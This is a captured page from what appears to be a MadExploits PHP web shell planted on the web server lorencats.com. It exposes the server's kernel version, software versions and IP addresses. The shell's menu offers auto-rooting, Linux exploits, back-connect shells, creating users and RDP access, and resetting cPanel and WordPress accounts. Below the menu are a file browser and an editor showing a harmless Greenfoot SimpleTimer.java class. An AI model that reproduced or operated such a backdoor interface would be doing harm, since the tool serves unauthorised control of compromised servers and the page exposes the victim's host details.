Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.217.91
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
greenfoot /
greenfoot /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
Animal.html
7.37
KB
-rw-r--r--
Animal.java
1.55
KB
-rw-r--r--
Counter.html
9.09
KB
-rw-r--r--
Counter.java
3.08
KB
-rw-r--r--
Counter.png
4.06
KB
-rw-r--r--
GifImage.html
7.37
KB
-rw-r--r--
GifImage.java
28.66
KB
-rw-r--r--
Label.html
8.75
KB
-rw-r--r--
Label.java
2.16
KB
-rw-r--r--
Map.html
9.93
KB
-rw-r--r--
Map.java
4.12
KB
-rw-r--r--
ScoreBoard.html
4.33
KB
-rw-r--r--
ScoreBoard.java
4.09
KB
-rw-r--r--
SimpleTimer.html
6.36
KB
-rw-r--r--
SimpleTimer.java
1.74
KB
-rw-r--r--
SmoothMover.html
8.87
KB
-rw-r--r--
SmoothMover.java
1.74
KB
-rw-r--r--
inherit.gif
57
B
-rw-r--r--
script.js
5.41
KB
-rw-r--r--
stylesheet.css
21.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SimpleTimer.java
/** * A simple timer class that allows you to keep track of how much time * has passed between events. * * You use this class by creating a timer as a member field in your actor (or whatever): * <pre> * * private SimpleTimer timer = new SimpleTimer(); * </pre> * * Then when you want to start the timer (for example, when a shot is fired), you call the mark() method: * * <pre> * * timer.mark(); * </pre> * * Thereafter, you can use the millisElapsed() method to find out how long it's been since mark() * was called (in milliseconds, i.e. thousandths of a second). So if you want to only allow the player to fire a shot every second, you * could write: * * <pre> * * if (timer.millisElapsed() > 1000 && Greenfoot.isKeyDown("space")) * { * // Code here for firing a new shot * timer.mark(); // Reset the timer * } * </pre> * * @author Neil Brown * @version 1.0 */ public class SimpleTimer { private long lastMark = System.currentTimeMillis(); /** * Marks the current time. You can then in future call * millisElapsed() to find out the elapsed milliseconds * since this mark() call was made. * * A second mark() call will reset the mark, and millisElapsed() * will start increasing from zero again. */ public void mark() { lastMark = System.currentTimeMillis(); } /** * Returns the amount of milliseconds that have elapsed since mark() * was last called. This timer runs irrespective of Greenfoot's * act() cycle, so if you call it many times during the same Greenfoot frame, * you may well get different answers. */ public int millisElapsed() { return (int) (System.currentTimeMillis() - lastMark); } }
Close